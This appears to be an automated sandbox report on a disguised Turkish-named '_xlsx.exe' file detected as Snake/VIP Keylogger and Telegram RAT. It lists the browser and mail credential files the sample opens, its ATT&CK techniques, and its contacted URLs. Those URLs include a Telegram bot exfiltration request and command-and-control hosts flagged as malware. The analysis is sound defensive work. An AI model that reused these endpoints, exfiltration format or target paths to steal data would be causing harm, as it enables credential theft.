Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Queries volume information: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Queries volume information: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: YzkHZRBcm.exe PID: 6504, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: YzkHZRBcm.exe PID: 6504, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: YzkHZRBcm.exe PID: 6504, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: YzkHZRBcm.exe PID: 6504, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: YzkHZRBcm.exe PID: 6504, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	1 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	53%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeStealer
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	53%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeStealer

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.96.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	132.226.247.73	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2021:07:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2007/10/2024%20/%2020:57:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000031C9000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/chrome_newtab	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20a	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.office.com/lB	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000031C4000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore?hl=en	YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003198000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003189000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
